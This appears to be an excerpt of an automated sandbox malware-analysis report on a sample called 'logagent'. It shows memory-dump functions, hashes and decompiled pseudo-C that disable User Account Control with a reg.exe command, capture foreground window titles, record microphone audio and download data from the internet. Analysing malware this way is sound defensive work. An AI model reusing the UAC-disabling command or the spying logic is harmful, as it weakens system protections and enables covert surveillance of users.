                                  0x0040a0fe
                                  0x0040a0ff
                                  0x0040a100
                                  0x0040a11f
                                  0x0040a12e
                                  0x0040a138

                                  APIs
                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,0041BA38,0041BCB0), ref: 0040A11F
                                  • CloseHandle.KERNEL32(?), ref: 0040A12E
                                  • CloseHandle.KERNEL32(?), ref: 0040A133
                                  Strings
                                  • D, xrefs: 0040A0F6
                                  • C:\Windows\System32\cmd.exe, xrefs: 0040A11A
                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040A115
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$CreateProcess
                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                                  • API String ID: 2922976086-1747066916
                                  • Opcode ID: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                  • Instruction ID: 0928101be9c5a4b5cd6cbd2924aec545eff454ae04b53be068f3b7a54285d6aa
                                  • Opcode Fuzzy Hash: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                  • Instruction Fuzzy Hash: 5EF054B2A00518BEFB019BE8DC05EFFBB7DE784700F114436FA11F6060D6746D088AA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004127F5 Relevance: 10.5, APIs: 7, Instructions: 31COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 2478582372-0
                                  • Opcode ID: f35f0c3dd271747c8617ee2a79da0f1b075a0c74f27328e3a593d3adc6a0a34e
                                  • Instruction ID: 9f96166dac4781290f3bd34c47d79f1531a5159583b3a655759a1da2a24b60ea
                                  • Opcode Fuzzy Hash: f35f0c3dd271747c8617ee2a79da0f1b075a0c74f27328e3a593d3adc6a0a34e
                                  • Instruction Fuzzy Hash: 50F0F97590060EEBCF04EFA0DD5D9EE7B78AF84349B008024F90697290DA70AA09CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412795 Relevance: 10.5, APIs: 7, Instructions: 31COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                  • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                  • String ID:
                                  • API String ID: 914748455-0
                                  • Opcode ID: 071d9129cc4c15a7588e784708c8bfb61fe96f0cebcdac03ffdaa68953a5de9b
                                  • Instruction ID: f669f26280469c21e485b93068b71aa9fa6b13bd9f3a6efc1e343f131735dcea
                                  • Opcode Fuzzy Hash: 071d9129cc4c15a7588e784708c8bfb61fe96f0cebcdac03ffdaa68953a5de9b
                                  • Instruction Fuzzy Hash: 08F0A97690450EEBCB04EFA0ED5DDEE7B78EB84305B048065F906972A0DA74AA09CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054C7F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 485sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 1054C817
                                    • Part of subcall function 10553E4D: time.MSVCRT ref: 10553E74
                                    • Part of subcall function 10553E4D: srand.MSVCRT ref: 10553E81
                                  • Sleep.KERNEL32(00000064), ref: 1054C96C
                                    • Part of subcall function 1055476E: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,105435A8,00000000), ref: 10554788
                                  • Sleep.KERNEL32(000001F4), ref: 1054CBB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileSleep$CreateModuleNamesrandtime
                                  • String ID: /stext "$(VA
                                  • API String ID: 2367270535-1999781807
                                  • Opcode ID: d59d310995aa2f70bac365abca90406b2b7745100f9f3f901980419f6c0f6b76
                                  • Instruction ID: c881891a41934dad47a0f8c8ea268d1f2e8149e05080569a066b4cd6cfa5f662
                                  • Opcode Fuzzy Hash: d59d310995aa2f70bac365abca90406b2b7745100f9f3f901980419f6c0f6b76
                                  • Instruction Fuzzy Hash: 2502FD72C0050EEBDB04EBE0EC59EDEBB7CEF94245F048166F516E3050EA756649CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105442ED Relevance: 9.2, APIs: 6, Instructions: 167windowmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 34%
                                  			E105442ED(void* __eflags, intOrPtr _a4, char _a7) {
				char _v5;
				void* _v12;
				char _v28;
				void* _v44;
				char _v60;
				char _v76;
				char _v92;
				struct tagMSG _v120;
				intOrPtr* _t31;
				intOrPtr _t49;
				void* _t54;
				void* _t62;
				void* _t76;
				void* _t77;
				intOrPtr _t109;
				void* _t111;
				void* _t115;
				void* _t118;
				void* _t119;
				void* _t121;

				_t121 = __eflags;
				_t109 = _a4;
				 *0x41533c(_t109 + 0x18);
				SetEvent( *(_t109 + 0x28));
				_t31 =  *0x415344();
				 *0x415304();
				 *0x41533c();
				 *0x41533c();
				E1055437A(_t121,  &_v28,  &_v76, 0x41b310,  &_v76, 4,  *((intOrPtr*)( *0x4152fc)));
				_t118 = _t115 + 0x24;
				_t111 =  *_t31 - 0x3a;
				if(_t111 == 0) {
					E1054319B( &_v28, __eflags, 0);
					_t76 = E10548768( *0x415344());
					__eflags = _t76;
					if(_t76 == 0) {
						L12:
						E1054316C( &_v28);
						 *0x415348();
						 *0x415348();
						__eflags = 0;
						return 0;
					}
					 *0x41b794 = E105489C2(_t76, 0x41575c);
					 *0x41b798 = E105489C2(_t76, 0x415750);
					_t49 = E105489C2(_t76, 0x415744);
					_t119 = _t118 + 8;
					 *0x41b79c = _t49;
					 *0x41b790 = 1;
					 *0x41533c();
					E10543A51(_t109, 0x74, 0x41b738);
					L10:
					_t77 = HeapCreate(0, 0, 0);
					_t54 =  *0x41b798(_t77,  &_v12);
					__eflags = _t54;
					if(_t54 != 0) {
						_t119 = _t119 - 0x10;
						 *0x415330(_t54,  &_v5);
						E10543A51(_t109, 0x3b, _v12);
						HeapFree(_t77, 0, _v12);
					}
					goto L10;
				}
				_t123 = _t111 != 1;
				if(_t111 != 1) {
					goto L12;
				}
				E10554210();
				_t62 =  *0x41b794( *0x41532c( &_v92, E1054319B( &_v28, _t123, 0)));
				 *0x415350();
				if(_t62 == 0) {
					goto L12;
				}
				 *0x4152f4( &_a7);
				E105541E4( &_v60, _t118 - 0x10,  &_v60);
				E10543A51(_t109, 0x3b, 0x41576c);
				 *0x415350();
				L4:
				while(GetMessageA( &_v120, 0, 0, 0) <= 0) {
					if(__eflags >= 0) {
						goto L12;
					}
				}
				TranslateMessage( &_v120);
				DispatchMessageA( &_v120);
				goto L4;
			}























                                  0x105442ed
                                  0x105442f6
                                  0x10544300
                                  0x10544309
                                  0x10544312
                                  0x1054432a
                                  0x1054433a
                                  0x10544349
                                  0x10544353
                                  0x10544358
                                  0x1054435b
                                  0x1054435e
                                  0x1054440f
                                  0x10544422
                                  0x10544425
                                  0x10544427
                                  0x105444c2
                                  0x105444c5
                                  0x105444cd
                                  0x105444d6
                                  0x105444de
                                  0x105444e2
                                  0x105444e2
                                  0x1054443e
                                  0x1054444e
                                  0x10544453
                                  0x10544458
                                  0x1054445b
                                  0x10544462
                                  0x1054446e
                                  0x10544478
                                  0x1054447d
                                  0x10544486
                                  0x1054448d
                                  0x10544494
                                  0x10544497
                                  0x10544499
                                  0x105444a6
                                  0x105444b0
                                  0x105444ba
                                  0x105444ba
                                  0x00000000
                                  0x10544497
                                  0x10544364
                                  0x10544365
                                  0x00000000
                                  0x00000000
                                  0x1054437b
                                  0x1054438b
                                  0x10544397
                                  0x1054439f
                                  0x00000000
                                  0x00000000
                                  0x105443b1
                                  0x105443c1
                                  0x105443cc
                                  0x105443d4
                                  0x00000000
                                  0x105443da
                                  0x10544401
                                  0x00000000
                                  0x00000000
                                  0x10544407
                                  0x105443ef
                                  0x105443f9
                                  0x00000000

                                  APIs
                                  • SetEvent.KERNEL32(?), ref: 10544309
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 105443E1
                                  • TranslateMessage.USER32(?), ref: 105443EF
                                  • DispatchMessageA.USER32(?), ref: 105443F9
                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 10544480
                                  • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 105444BA
                                    • Part of subcall function 10554210: ??2@YAPAXI@Z.MSVCRT ref: 1055422A
                                    • Part of subcall function 10554210: ??3@YAXPAX@Z.MSVCRT ref: 10554275
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$Heap$??2@??3@CreateDispatchEventFreeTranslate
                                  • String ID:
                                  • API String ID: 3534166713-0
                                  • Opcode ID: 125cd5be9a9c0694a7d7584a9183133b2ec1a116ec69db6993fa9076d658da0d
                                  • Instruction ID: 6b7518d8b66daad7292da22b99f69edcdbbe8f0b701430f294a67c64aed83f97
                                  • Opcode Fuzzy Hash: 125cd5be9a9c0694a7d7584a9183133b2ec1a116ec69db6993fa9076d658da0d
                                  • Instruction Fuzzy Hash: 4F514E72A00609EBCB04ABF0EC8E9EE7F78EF84351B604425F516D31A0EF75A945CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054734D Relevance: 9.2, APIs: 6, Instructions: 158sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 26%
                                  			E1054734D(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				intOrPtr _v12;
				signed int _v16;
				char _v28;
				char _v44;
				char _v60;
				char _v76;
				void* _v92;
				intOrPtr _t41;
				int _t43;
				signed int _t50;
				void* _t57;
				int _t64;
				struct HWND__* _t109;
				intOrPtr _t110;
				void* _t115;

				_v12 = __ecx;
				while(1) {
					_t41 = _v12;
					if( *((intOrPtr*)(_t41 + 0x3c)) == 0 &&  *((intOrPtr*)(_t41 + 0x3d)) == 0) {
						break;
					}
					if(( *0x41b990 & 0x00000001) == 0) {
						 *0x41b990 =  *0x41b990 | 0x00000001;
						 *0x41534c( &_v5);
						E10555801(0x405bb5);
					}
					Sleep(0x1f4);
					_t109 = GetForegroundWindow();
					_t43 = GetWindowTextLengthA(_t109);
					_t111 = _t43;
					_t9 = _t111 + 1; // 0x1
					 *0x4151f4(_t9, 0,  &_v6);
					if(_t43 != 0) {
						_t64 =  *0x4152e4();
						GetWindowTextA(_t109,  *0x415344(), _t64);
						_push(0x41b998);
						_push( &_v44);
						if( *0x4151f0() == 0) {
							 *0x415338( &_v44);
							 *0x415340( *0x4152e4() - 1);
							if( *0x41b93e == 0) {
								_t119 = _t115 - 0x10;
								L10555B05();
								L10555AFF();
								_t115 = _t115 - 0x10 + 0x18;
								E10546E78(_v12, _t119,  &_v60,  &_v60, 0x415a4c,  &_v44);
								 *0x415348(0x415a54, 0);
							} else {
								_t115 = _t115 - 0x10;
								 *0x41533c( &_v44);
								E10547762(_v12);
							}
						}
					}
					_t110 = _v12;
					_t87 = _t110;
					E105485C4(_t110);
					if(E1055402A(_t110) < 0xea60) {
						L16:
						 *0x415348();
						continue;
					} else {
						while( *((intOrPtr*)(_t110 + 0x3c)) != 0 ||  *((intOrPtr*)(_t110 + 0x3d)) != 0) {
							_t50 = E1055402A(_t87);
							if(_t50 < 0xea60) {
								 *0x41541c(_v16 / 0xea60,  &_v28, 0xa);
								_t117 = _t115 + 0xc - 0x10;
								_t57 =  *0x415318( &_v28,  &_v7, 0x415a78, 0);
								L10555B05();
								L10555AFF();
								_t115 = _t115 + 0xc - 0x10 + 0x18;
								E10546E78(_t110, _t117,  &_v76,  &_v76, 0x415a5c, _t57);
								 *0x415348();
								 *0x415348();
								goto L16;
							}
							_v16 = _t50;
							Sleep(0x3e8);
						}
						 *0x415348();
						break;
					}
				}
				return 0;
			}





















                                  0x10547356
                                  0x1054735b
                                  0x1054735b
                                  0x10547361
                                  0x00000000
                                  0x00000000
                                  0x10547373
                                  0x10547375
                                  0x10547385
                                  0x10547390
                                  0x10547395
                                  0x1054739b
                                  0x105473a7
                                  0x105473aa
                                  0x105473b0
                                  0x105473b7
                                  0x105473be
                                  0x105473c6
                                  0x105473cf
                                  0x105473e1
                                  0x105473ea
                                  0x105473ef
                                  0x105473fa
                                  0x10547405
                                  0x10547419
                                  0x10547425
                                  0x10547444
                                  0x10547458
                                  0x10547462
                                  0x1054746a
                                  0x1054746d
                                  0x10547475
                                  0x10547427
                                  0x10547427
                                  0x10547430
                                  0x10547439
                                  0x10547439
                                  0x10547425
                                  0x105473fa
                                  0x1054747b
                                  0x1054747e
                                  0x10547480
                                  0x10547491
                                  0x10547526
                                  0x10547529
                                  0x00000000
                                  0x10547497
                                  0x10547497
                                  0x105474a5
                                  0x105474ac
                                  0x105474cc
                                  0x105474dc
                                  0x105474eb
                                  0x105474fb
                                  0x10547505
                                  0x1054750a
                                  0x1054750f
                                  0x10547517
                                  0x10547520
                                  0x00000000
                                  0x10547520
                                  0x105474b3
                                  0x105474b6
                                  0x105474b6
                                  0x10547537
                                  0x00000000
                                  0x10547537
                                  0x10547491
                                  0x10547543

                                  APIs
                                  • Sleep.KERNEL32(000001F4), ref: 1054739B
                                  • GetForegroundWindow.USER32 ref: 105473A1
                                  • GetWindowTextLengthA.USER32(00000000), ref: 105473AA
                                  • GetWindowTextA.USER32(00000000,00000000), ref: 105473E1
                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,00415A54,?,?,00000000), ref: 105474B6
                                  • _itoa.MSVCRT ref: 105474CC
                                    • Part of subcall function 10546E78: SetEvent.KERNEL32(?,?,1054866C,?,?,?,?,?,00415D88), ref: 10546EA7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$SleepText$EventForegroundLength_itoa
                                  • String ID:
                                  • API String ID: 4128525496-0
                                  • Opcode ID: acb9145f4f3c268f41fa4fd6706b6193e652c9364fdfcfa20cf4a7a3c30a3bd3
                                  • Instruction ID: 964a6adf01ead198c3133bdb31d656bd7e6b9559f6b65ad57fe940420a15d84e
                                  • Opcode Fuzzy Hash: acb9145f4f3c268f41fa4fd6706b6193e652c9364fdfcfa20cf4a7a3c30a3bd3
                                  • Instruction Fuzzy Hash: 9F517272D0064DEBCB00EBE0DC9D9EE7F78EF84251F144066E502E7190EB746989CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10553EE2 Relevance: 9.1, APIs: 6, Instructions: 103networkfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E10553EE2(void* __ecx, void* __eflags, char* _a4, void** _a8, long _a12, signed int _a15) {
				void* _v8;
				char* _v12;
				void* _v16;
				void _v10016;
				void* _t35;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				unsigned int* _t55;
				signed int _t57;
				signed int _t58;
				signed int _t64;
				signed int _t74;
				char* _t98;
				intOrPtr* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;

				E1055585F(0x271c, __ecx);
				_t55 = _a12;
				_a15 = _a15 & 0x00000000;
				_t98 = 0;
				 *_a8 = 0;
				 *_t55 = 0;
				_t35 = InternetOpenA(0x416c68, 1, 0, 0, 0);
				_v16 = _t35;
				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0);
				_v8 = _t36;
				if(_t36 != 0) {
					_a12 = 0;
					_a4 = 0;
					while(1) {
						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710,  &_a12);
						if(_t42 != 0 && _a12 <= _t98) {
							break;
						}
						_t44 =  *_t55 + _a12;
						_push(_t44);
						L10555813();
						_t57 =  *_t55;
						_t100 = _a4;
						_t58 = _t57 >> 2;
						_v12 = memcpy(_t44, _t100, _t58 << 2);
						_push(_a4);
						_t46 = memcpy(_t100 + _t58 + _t58, _t100, _t57 & 0x00000003);
						_t101 =  &_v10016;
						_t64 = _a12 >> 2;
						memcpy(_t101 + _t64 + _t64, _t101, memcpy(_t46 +  *_t55, _t101, _t64 << 2) & 0x00000003);
						_t103 = _t103 + 0x30;
						L1055584D();
						_a4 = _v12;
						 *_t55 =  *_t55 + _a12;
						_t98 = 0;
					}
					_push( *_t55);
					L10555813();
					_t102 = _a4;
					 *_a8 = _t42;
					_t74 =  *_t55 >> 2;
					memcpy(_t102 + _t74 + _t74, _t102, memcpy(_t42, _t102, _t74 << 2) & 0x00000003);
					_a15 = 1;
				}
				_t99 =  *0x4154ec;
				 *_t99(_v16);
				 *_t99(_v8);
				return _a15;
			}























                                  0x10553eea
                                  0x10553ef3
                                  0x10553ef7
                                  0x10553efb
                                  0x10553f02
                                  0x10553f09
                                  0x10553f0b
                                  0x10553f1c
                                  0x10553f20
                                  0x10553f28
                                  0x10553f2b
                                  0x10553f32
                                  0x10553f35
                                  0x10553f38
                                  0x10553f4b
                                  0x10553f53
                                  0x00000000
                                  0x00000000
                                  0x10553f5c
                                  0x10553f5f
                                  0x10553f60
                                  0x10553f65
                                  0x10553f67
                                  0x10553f6e
                                  0x10553f75
                                  0x10553f7b
                                  0x10553f7e
                                  0x10553f89
                                  0x10553f8f
                                  0x10553f99
                                  0x10553f99
                                  0x10553f9b
                                  0x10553fa4
                                  0x10553faa
                                  0x10553fad
                                  0x10553fad
                                  0x10553fb1
                                  0x10553fb3
                                  0x10553fb9
                                  0x10553fc1
                                  0x10553fc7
                                  0x10553fd1
                                  0x10553fd3
                                  0x10553fd7
                                  0x10553fdb
                                  0x10553fe1
                                  0x10553fe6
                                  0x10553fee

                                  APIs
                                  • InternetOpenA.WININET(00416C68,00000001,00000000,00000000,00000000), ref: 10553F0B
                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 10553F20
                                  • InternetReadFile.WININET(?,?,00002710,?), ref: 10553F4B
                                  • ??2@YAPAXI@Z.MSVCRT ref: 10553F60
                                  • ??3@YAXPAX@Z.MSVCRT ref: 10553F9B
                                  • ??2@YAPAXI@Z.MSVCRT ref: 10553FB3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@Open$??3@FileRead
                                  • String ID:
                                  • API String ID: 616262281-0
                                  • Opcode ID: a66c82bf94d4ad45f48ea1a47f44ef61043bedc47cbf00052cdf97e8b8865f08
                                  • Instruction ID: a1d2914f0a4d571697f7481995f09ac5e7d878ed4316e60529bded13bfa6cda9
                                  • Opcode Fuzzy Hash: a66c82bf94d4ad45f48ea1a47f44ef61043bedc47cbf00052cdf97e8b8865f08
                                  • Instruction Fuzzy Hash: 89314A31A00229AFCF15CF68D899ADF7FA5FF49750F10806AF909D7250CB70AA54DB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10542FCF Relevance: 9.1, APIs: 6, Instructions: 102stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 20%
                                  			E10542FCF(void* __edx, intOrPtr _a8, char _a11) {
				char _v5;
				char _v12;
				void* _v28;
				char _v44;
				char _v60;
				char _v76;
				char _v92;
				char _v108;
				char _v188;
				char* _t38;
				char* _t39;
				char* _t40;
				void* _t71;

				 *0x415354( &_v5);
				if(_a8 == 0x3c0) {
					 *0x415400( &_v12, _t71);
					 *0x415408( &_v188, 0x50, 0x4155c0,  *0x415404( &_v12));
					 *0x415318( &_v188,  &_a11);
					_t38 =  &_v76;
					L10555AE1();
					_t39 =  &_v108;
					L10555ADB();
					_t40 =  &_v60;
					L10555AD5();
					 *0x415328(_t40, _t40, _t39, _t39, _t38, _t38, 0x41b1e8, 0x5c, E10554124( &_v92,  &_v44), 0x4155b4);
					 *0x415350();
					 *0x415350();
					 *0x415350();
					 *0x415350();
					 *0x415348();
					E10542D4D( *0x41532c(), 0x41b1a0);
					waveInUnprepareHeader( *0x41b210, 0x41b1a0, 0x20);
					0x41b1a0->lpData =  *0x415344();
					 *0x41b1a4 =  *0x41b1d8;
					 *0x41b1a8 = 0;
					 *0x41b1ac = 0;
					 *0x41b1b0 = 0;
					 *0x41b1b4 = 0;
					waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
					waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
				}
				return  *0x415350();
			}
















                                  0x10542fdf
                                  0x10542fec
                                  0x10542ff7
                                  0x10543016
                                  0x1054302d
                                  0x1054304a
                                  0x10543053
                                  0x1054305c
                                  0x10543060
                                  0x10543069
                                  0x1054306d
                                  0x10543079
                                  0x10543082
                                  0x1054308b
                                  0x10543094
                                  0x1054309d
                                  0x105430a6
                                  0x105430bc
                                  0x105430cc
                                  0x105430dd
                                  0x105430e7
                                  0x105430ee
                                  0x105430f3
                                  0x105430f8
                                  0x105430fd
                                  0x1054310b
                                  0x1054311a
                                  0x10543120
                                  0x1054312b

                                  APIs
                                  • time.MSVCRT ref: 10542FF7
                                  • localtime.MSVCRT ref: 10543001
                                  • strftime.MSVCRT ref: 10543016
                                    • Part of subcall function 10542D4D: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10542DB3
                                  • waveInUnprepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,004155B4), ref: 105430CC
                                  • waveInPrepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,004155B4), ref: 1054310B
                                  • waveInAddBuffer.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,004155B4), ref: 1054311A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: wave$Header$BufferCreateFilePrepareUnpreparelocaltimestrftimetime
                                  • String ID:
                                  • API String ID: 1599079354-0
                                  • Opcode ID: 18d6cc70cc32b2794b9faa94895c5be64e3b88424e72b5cc26cd6ac8af64b8c5
                                  • Instruction ID: 6e2865b6f0f149b92f12967f0030c76ece938b5495738c5f384f01600cbb7a86
                                  • Opcode Fuzzy Hash: 18d6cc70cc32b2794b9faa94895c5be64e3b88424e72b5cc26cd6ac8af64b8c5
                                  • Instruction Fuzzy Hash: A941B77190060DEFDB00EBA0EC5DADE7F79EB48355F448036F505D61A0EB746689CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10542EA8 Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 47%
                                  			E10542EA8(void* __eflags) {
				signed int _t6;
				signed int _t23;
				intOrPtr* _t29;
				void* _t30;

				_t30 = __eflags;
				CreateDirectoryW( *0x41532c(), 0);
				0x41b218->wFormatTag = 1;
				 *0x41b21a = 1;
				 *0x41b21c = 0x1f40;
				 *0x41b226 = 8;
				 *0x41b220 = 0x1f40;
				 *0x41b224 = 1;
				 *0x41b228 = 0;
				E1054319B(0x41bcb0, _t30, 0x24);
				_t6 = atoi( *0x415344());
				 *_t29 = 0x30008;
				_t23 =  *0x41b21c * _t6 * 0x3c;
				 *0x41b1d0 = _t23;
				 *0x41b1d8 = (( *0x41b226 & 0x0000ffff) >> 3) * _t23;
				waveInOpen(0x41b210, 0xffffffff, 0x41b218, 0x401640, 0, ??);
				 *0x415340( *0x41b1d8);
				0x41b1a0->lpData =  *0x415344();
				 *0x41b1a4 =  *0x41b1d8;
				 *0x41b1a8 = 0;
				 *0x41b1ac = 0;
				 *0x41b1b0 = 0;
				 *0x41b1b4 = 0;
				waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
				waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
				waveInStart( *0x41b210);
				return 0;
			}







                                  0x10542ea8
